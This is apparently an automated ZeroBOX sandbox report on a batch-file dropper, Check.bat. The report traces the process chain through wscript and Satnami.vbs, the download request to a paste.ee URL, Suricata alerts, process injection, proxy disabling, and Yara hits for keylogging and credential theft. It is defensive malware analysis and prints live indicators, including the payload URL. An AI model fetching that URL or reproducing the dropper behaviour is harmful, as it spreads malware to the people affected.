Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 22, 2025, 10:32 a.m.	April 22, 2025, 10:34 a.m.

Size	567.0B
Type	DOS batch file, ASCII text, with CRLF line terminators
MD5	`aafec75f6933aa0f9c26ac43155f6818`
SHA256	`087da5a5f31efcaccb45dd4772bf60cbc8b7efac015c68408a275e6ec3de2e80`
CRC32	`0BEE477D`
ssdeep	`12:i7DNAfzGXcvMX2FzNHeqV3D1HoCJv9uLH3Xf/v9XCNPxJWT280RwKN5hk:i7DMp53Hl4LPCq3owyM`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "LNLWnzbEYSaVm" C:\Users\test22\AppData\Local\Temp\Check.bat
2536
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Check.bat
  2608
  - wscript.exe wscript //nologo "C:\Windows\Temp\Satnami.vbs"
    2696
  - timeout.exe timeout /t 1 /nobreak
    2772

Name	Response	Post-Analysis Lookup
paste.ee	A 23.186.113.60	23.186.113.60

IP Address	Status	Action
164.124.101.2	Active	Moloch
23.186.113.60	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 23.186.113.60:443 -> 192.168.56.101:49170	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49168 -> 23.186.113.60:443	2034978	ET POLICY Pastebin-style Service (paste .ee) in TLS SNI	Potential Corporate Privacy Violation
TCP 192.168.56.101:49168 -> 23.186.113.60:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49168 -> 23.186.113.60:443	2034978	ET POLICY Pastebin-style Service (paste .ee) in TLS SNI	Potential Corporate Privacy Violation
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2054041	ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee)	Misc activity
TCP 192.168.56.101:49168 -> 23.186.113.60:443	2034978	ET POLICY Pastebin-style Service (paste .ee) in TLS SNI	Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW April 22, 2025, 10:32 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ April 22, 2025, 10:32 a.m.	stacktrace: CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75aad08c TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75aa964b TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75a94d6b TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75a96f7c CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75a9e825 TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75a96002 TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75a95fe8 TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75a949e3 TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75a95a20 RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x76f49a91 LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x76f68f10 RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x76f68e5c ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x755c7a25 wscript+0x2fbd @ 0xb92fbd BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25 exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4 exception.instruction: call dword ptr [ecx + 0xc] exception.module: MSCTF.dll exception.exception_code: 0xc0000005 exception.offset: 278260 exception.address: 0x75ac3ef4 registers.esp: 3733024 registers.edi: 0 registers.eax: 42507632 registers.ebp: 3733052 registers.edx: 1 registers.ebx: 0 registers.esi: 4559336 registers.ecx: 1922381276	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

April 22, 2025, 10:32 a.m.

stacktrace:

CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75aad08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75aa964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75a94d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75a96f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75a9e825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75a96002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75a95fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75a949e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75a95a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x76f49a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x76f68f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x76f68e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x755c7a25
wscript+0x2fbd @ 0xb92fbd
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x75ac3ef4
registers.esp: 3733024
registers.edi: 0
registers.eax: 42507632
registers.ebp: 3733052
registers.edx: 1
registers.ebx: 0
registers.esi: 4559336
registers.ecx: 1922381276

Performs some HTTP requests (1 event)

request

GET http://paste.ee/d/SiFM4NNH/0

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 22, 2025, 10:32 a.m.	process_identifier: 2696 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73662000 process_handle: 0xffffffff	1	0	0

Creates executable files on the filesystem (1 event)

file	C:\Windows\Temp\Satnami.vbs

Yara rule detected in process memory (50 out of 62 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl

Wscript.exe initiated network communications indicative of a script based payload download (5 events)

Time & API	Arguments	Status	Return
WSASend April 22, 2025, 10:32 a.m.	buffer: GET /d/SiFM4NNH/0 HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: paste.ee socket: 588		0
InternetCrackUrlW April 22, 2025, 10:32 a.m.	url: http://paste.ee/d/SiFM4NNH/0 flags: 0	1	1
InternetCrackUrlW April 22, 2025, 10:32 a.m.	url: https://paste.ee/d/SiFM4NNH/0 flags: 0	1	1
WSASend April 22, 2025, 10:32 a.m.	buffer: kghñ§ðö@«Jí@´RJ.!ÕÛèòø:ÿÂYKÃUá/5 ÀÀÀ À 28&ÿ paste.ee socket: 940		0
WSASend April 22, 2025, 10:32 a.m.	buffer: 51hñ§R!)ë(ÆCr3îDóÆ¶;Ùø ÿ socket: 940		0

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA April 22, 2025, 10:32 a.m.	key_handle: 0x00000384 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

wscript.exe-based dropper (JScript, VBS) (2 events)

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (5 events)

Time & API	Arguments	Status	Return
WSASend April 22, 2025, 10:32 a.m.	buffer: GET /d/SiFM4NNH/0 HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: paste.ee socket: 588		0
InternetCrackUrlW April 22, 2025, 10:32 a.m.	url: http://paste.ee/d/SiFM4NNH/0 flags: 0	1	1
InternetCrackUrlW April 22, 2025, 10:32 a.m.	url: https://paste.ee/d/SiFM4NNH/0 flags: 0	1	1
WSASend April 22, 2025, 10:32 a.m.	buffer: kghñ§ðö@«Jí@´RJ.!ÕÛèòø:ÿÂYKÃUá/5 ÀÀÀ À 28&ÿ paste.ee socket: 940		0
WSASend April 22, 2025, 10:32 a.m.	buffer: 51hñ§R!)ë(ÆCr3îDóÆ¶;Ùø ÿ socket: 940		0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2608 resumed a thread in remote process 2696
NtResumeThread April 22, 2025, 10:32 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2696	1	0	0

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Windows\SysWOW64\wscript.exe

Check.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All